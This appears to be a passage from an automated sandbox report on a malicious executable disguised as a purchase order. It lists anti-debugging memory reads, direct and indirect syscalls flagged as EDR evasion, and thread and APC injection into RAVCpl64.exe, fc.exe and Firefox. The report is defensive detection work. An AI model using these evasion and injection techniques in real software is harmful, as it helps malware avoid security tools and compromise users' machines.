Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010348F0 mov eax, dword ptr fs:[00000030h]	0_2_010348F0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010B10 mov eax, dword ptr fs:[00000030h]	0_2_01010B10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010B10 mov eax, dword ptr fs:[00000030h]	0_2_01010B10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010B10 mov eax, dword ptr fs:[00000030h]	0_2_01010B10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010B10 mov eax, dword ptr fs:[00000030h]	0_2_01010B10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102EB1C mov eax, dword ptr fs:[00000030h]	0_2_0102EB1C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103CB20 mov eax, dword ptr fs:[00000030h]	0_2_0103CB20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108CB20 mov eax, dword ptr fs:[00000030h]	0_2_0108CB20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108CB20 mov eax, dword ptr fs:[00000030h]	0_2_0108CB20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108CB20 mov eax, dword ptr fs:[00000030h]	0_2_0108CB20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D4B67 mov eax, dword ptr fs:[00000030h]	0_2_010D4B67
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AB70 mov eax, dword ptr fs:[00000030h]	0_2_0100AB70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AB70 mov eax, dword ptr fs:[00000030h]	0_2_0100AB70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AB70 mov eax, dword ptr fs:[00000030h]	0_2_0100AB70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AB70 mov eax, dword ptr fs:[00000030h]	0_2_0100AB70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AB70 mov eax, dword ptr fs:[00000030h]	0_2_0100AB70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AB70 mov eax, dword ptr fs:[00000030h]	0_2_0100AB70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006B70 mov eax, dword ptr fs:[00000030h]	0_2_01006B70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006B70 mov eax, dword ptr fs:[00000030h]	0_2_01006B70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006B70 mov eax, dword ptr fs:[00000030h]	0_2_01006B70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006B70 mov eax, dword ptr fs:[00000030h]	0_2_01006B70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006B70 mov eax, dword ptr fs:[00000030h]	0_2_01006B70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006B70 mov eax, dword ptr fs:[00000030h]	0_2_01006B70
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01034B79 mov eax, dword ptr fs:[00000030h]	0_2_01034B79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010B6B77 mov eax, dword ptr fs:[00000030h]	0_2_010B6B77
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C8BBE mov eax, dword ptr fs:[00000030h]	0_2_010C8BBE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C8BBE mov eax, dword ptr fs:[00000030h]	0_2_010C8BBE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C8BBE mov eax, dword ptr fs:[00000030h]	0_2_010C8BBE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010C8BBE mov eax, dword ptr fs:[00000030h]	0_2_010C8BBE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01084BC0 mov eax, dword ptr fs:[00000030h]	0_2_01084BC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01084BC0 mov eax, dword ptr fs:[00000030h]	0_2_01084BC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01084BC0 mov eax, dword ptr fs:[00000030h]	0_2_01084BC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01084BC0 mov eax, dword ptr fs:[00000030h]	0_2_01084BC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01028BD1 mov eax, dword ptr fs:[00000030h]	0_2_01028BD1
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01028BD1 mov eax, dword ptr fs:[00000030h]	0_2_01028BD1
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A6BDE mov ebx, dword ptr fs:[00000030h]	0_2_010A6BDE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A6BDE mov eax, dword ptr fs:[00000030h]	0_2_010A6BDE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D4BE0 mov eax, dword ptr fs:[00000030h]	0_2_010D4BE0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103AA0E mov eax, dword ptr fs:[00000030h]	0_2_0103AA0E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103AA0E mov eax, dword ptr fs:[00000030h]	0_2_0103AA0E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFEBC0 mov eax, dword ptr fs:[00000030h]	0_2_00FFEBC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102EA40 mov eax, dword ptr fs:[00000030h]	0_2_0102EA40
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102EA40 mov eax, dword ptr fs:[00000030h]	0_2_0102EA40
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0109AA40 mov eax, dword ptr fs:[00000030h]	0_2_0109AA40
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0109AA40 mov eax, dword ptr fs:[00000030h]	0_2_0109AA40
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01084A57 mov eax, dword ptr fs:[00000030h]	0_2_01084A57
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01084A57 mov eax, dword ptr fs:[00000030h]	0_2_01084A57
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010B6A80 mov eax, dword ptr fs:[00000030h]	0_2_010B6A80
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A4AC2 mov eax, dword ptr fs:[00000030h]	0_2_010A4AC2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010ACE mov eax, dword ptr fs:[00000030h]	0_2_01010ACE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01010ACE mov eax, dword ptr fs:[00000030h]	0_2_01010ACE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFCB1E mov eax, dword ptr fs:[00000030h]	0_2_00FFCB1E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D4AE8 mov eax, dword ptr fs:[00000030h]	0_2_010D4AE8
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01020AEB mov eax, dword ptr fs:[00000030h]	0_2_01020AEB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01020AEB mov eax, dword ptr fs:[00000030h]	0_2_01020AEB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01020AEB mov eax, dword ptr fs:[00000030h]	0_2_01020AEB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A0AE0 mov eax, dword ptr fs:[00000030h]	0_2_010A0AE0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A2AE0 mov eax, dword ptr fs:[00000030h]	0_2_010A2AE0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A2AE0 mov eax, dword ptr fs:[00000030h]	0_2_010A2AE0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000AED mov eax, dword ptr fs:[00000030h]	0_2_01000AED
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000AED mov eax, dword ptr fs:[00000030h]	0_2_01000AED
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000AED mov eax, dword ptr fs:[00000030h]	0_2_01000AED
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080AFF mov eax, dword ptr fs:[00000030h]	0_2_01080AFF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080AFF mov eax, dword ptr fs:[00000030h]	0_2_01080AFF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080AFF mov eax, dword ptr fs:[00000030h]	0_2_01080AFF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AD00 mov eax, dword ptr fs:[00000030h]	0_2_0100AD00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AD00 mov eax, dword ptr fs:[00000030h]	0_2_0100AD00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AD00 mov eax, dword ptr fs:[00000030h]	0_2_0100AD00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AD00 mov eax, dword ptr fs:[00000030h]	0_2_0100AD00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AD00 mov eax, dword ptr fs:[00000030h]	0_2_0100AD00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100AD00 mov eax, dword ptr fs:[00000030h]	0_2_0100AD00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01020D01 mov eax, dword ptr fs:[00000030h]	0_2_01020D01
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01098D0A mov eax, dword ptr fs:[00000030h]	0_2_01098D0A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108CD00 mov eax, dword ptr fs:[00000030h]	0_2_0108CD00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108CD00 mov eax, dword ptr fs:[00000030h]	0_2_0108CD00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102CD10 mov eax, dword ptr fs:[00000030h]	0_2_0102CD10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102CD10 mov ecx, dword ptr fs:[00000030h]	0_2_0102CD10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov eax, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov eax, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov eax, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov ecx, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov eax, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov eax, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov eax, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov eax, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov eax, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102AD20 mov eax, dword ptr fs:[00000030h]	0_2_0102AD20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010B0D24 mov eax, dword ptr fs:[00000030h]	0_2_010B0D24
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010B0D24 mov eax, dword ptr fs:[00000030h]	0_2_010B0D24
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010B0D24 mov eax, dword ptr fs:[00000030h]	0_2_010B0D24
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010B0D24 mov eax, dword ptr fs:[00000030h]	0_2_010B0D24
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF6CC0 mov eax, dword ptr fs:[00000030h]	0_2_00FF6CC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF6CC0 mov eax, dword ptr fs:[00000030h]	0_2_00FF6CC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF6CC0 mov eax, dword ptr fs:[00000030h]	0_2_00FF6CC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D4D4B mov eax, dword ptr fs:[00000030h]	0_2_010D4D4B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107CD40 mov eax, dword ptr fs:[00000030h]	0_2_0107CD40
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107CD40 mov eax, dword ptr fs:[00000030h]	0_2_0107CD40
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A6D79 mov esi, dword ptr fs:[00000030h]	0_2_010A6D79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006D91 mov eax, dword ptr fs:[00000030h]	0_2_01006D91
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFCC68 mov eax, dword ptr fs:[00000030h]	0_2_00FFCC68
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D4DA7 mov eax, dword ptr fs:[00000030h]	0_2_010D4DA7
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01032DBC mov eax, dword ptr fs:[00000030h]	0_2_01032DBC
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01032DBC mov ecx, dword ptr fs:[00000030h]	0_2_01032DBC
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF8C3D mov eax, dword ptr fs:[00000030h]	0_2_00FF8C3D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010BADD6 mov eax, dword ptr fs:[00000030h]	0_2_010BADD6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010BADD6 mov eax, dword ptr fs:[00000030h]	0_2_010BADD6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CCDEB mov eax, dword ptr fs:[00000030h]	0_2_010CCDEB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CCDEB mov eax, dword ptr fs:[00000030h]	0_2_010CCDEB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFEDFA mov eax, dword ptr fs:[00000030h]	0_2_00FFEDFA
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01032C10 mov eax, dword ptr fs:[00000030h]	0_2_01032C10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01032C10 mov eax, dword ptr fs:[00000030h]	0_2_01032C10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01032C10 mov eax, dword ptr fs:[00000030h]	0_2_01032C10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01032C10 mov eax, dword ptr fs:[00000030h]	0_2_01032C10
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101AC20 mov eax, dword ptr fs:[00000030h]	0_2_0101AC20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101AC20 mov eax, dword ptr fs:[00000030h]	0_2_0101AC20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101AC20 mov eax, dword ptr fs:[00000030h]	0_2_0101AC20
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF8DCD mov eax, dword ptr fs:[00000030h]	0_2_00FF8DCD
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01034C3D mov eax, dword ptr fs:[00000030h]	0_2_01034C3D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D4C59 mov eax, dword ptr fs:[00000030h]	0_2_010D4C59
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF6DA6 mov eax, dword ptr fs:[00000030h]	0_2_00FF6DA6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFCD8A mov eax, dword ptr fs:[00000030h]	0_2_00FFCD8A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFCD8A mov eax, dword ptr fs:[00000030h]	0_2_00FFCD8A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000C79 mov eax, dword ptr fs:[00000030h]	0_2_01000C79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000C79 mov eax, dword ptr fs:[00000030h]	0_2_01000C79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01000C79 mov eax, dword ptr fs:[00000030h]	0_2_01000C79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01008C79 mov eax, dword ptr fs:[00000030h]	0_2_01008C79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01008C79 mov eax, dword ptr fs:[00000030h]	0_2_01008C79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01008C79 mov eax, dword ptr fs:[00000030h]	0_2_01008C79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01008C79 mov eax, dword ptr fs:[00000030h]	0_2_01008C79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01008C79 mov eax, dword ptr fs:[00000030h]	0_2_01008C79
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01036CC0 mov eax, dword ptr fs:[00000030h]	0_2_01036CC0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103CCD1 mov ecx, dword ptr fs:[00000030h]	0_2_0103CCD1
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103CCD1 mov eax, dword ptr fs:[00000030h]	0_2_0103CCD1
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103CCD1 mov eax, dword ptr fs:[00000030h]	0_2_0103CCD1
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01092CD0 mov eax, dword ptr fs:[00000030h]	0_2_01092CD0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01092CD0 mov eax, dword ptr fs:[00000030h]	0_2_01092CD0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01092CD0 mov eax, dword ptr fs:[00000030h]	0_2_01092CD0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01028CDF mov eax, dword ptr fs:[00000030h]	0_2_01028CDF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01028CDF mov eax, dword ptr fs:[00000030h]	0_2_01028CDF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010D4CD2 mov eax, dword ptr fs:[00000030h]	0_2_010D4CD2
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080CEE mov eax, dword ptr fs:[00000030h]	0_2_01080CEE
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102ECF3 mov eax, dword ptr fs:[00000030h]	0_2_0102ECF3
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102ECF3 mov eax, dword ptr fs:[00000030h]	0_2_0102ECF3
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107CCF0 mov ecx, dword ptr fs:[00000030h]	0_2_0107CCF0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101CF00 mov eax, dword ptr fs:[00000030h]	0_2_0101CF00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101CF00 mov eax, dword ptr fs:[00000030h]	0_2_0101CF00
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFCEF0 mov eax, dword ptr fs:[00000030h]	0_2_00FFCEF0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFCEF0 mov eax, dword ptr fs:[00000030h]	0_2_00FFCEF0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFCEF0 mov eax, dword ptr fs:[00000030h]	0_2_00FFCEF0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFCEF0 mov eax, dword ptr fs:[00000030h]	0_2_00FFCEF0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFCEF0 mov eax, dword ptr fs:[00000030h]	0_2_00FFCEF0

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtClose: Direct from: 0x7FFB16209E7F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x581C28E	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x336E394	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x33756C1	Jump to behavior
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	NtResumeThread: Indirect: 0xEC3DF9	Jump to behavior
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	NtQueueApcThread: Indirect: 0xEBF561	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtQuerySystemInformation: Direct from: 0x337556A	Jump to behavior
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	NtSuspendThread: Indirect: 0xEC3AD9	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x336E4C3	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtClose: Direct from: 0x337574F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtResumeThread: Direct from: 0x581C4CB	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtCreateThreadEx: Direct from: 0x336CA5F	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x336D652	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x33754CE	Jump to behavior
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	NtClose: Indirect: 0xEBF5E6
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x58240AB	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x3375619	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x581C45D	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x3376B44	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x336E47F	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x7FFB4A462651	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtAllocateVirtualMemory: Direct from: 0x3379389	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x336C1EB	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x336E450	Jump to behavior
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	NtSetContextThread: Indirect: 0xEC37B9	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtQueryInformationToken: Direct from: 0x336DDD0	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Thread register set: target process: 7188	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Thread register set: target process: 7188	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Thread register set: target process: 6384	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe

Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Jump to behavior

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: RAVCpl64.exe, 00000002.00000000.22357379456.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000002.23285504174.0000000000D90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RAVCpl64.exe, 00000002.00000000.22357379456.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000002.23285504174.0000000000D90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
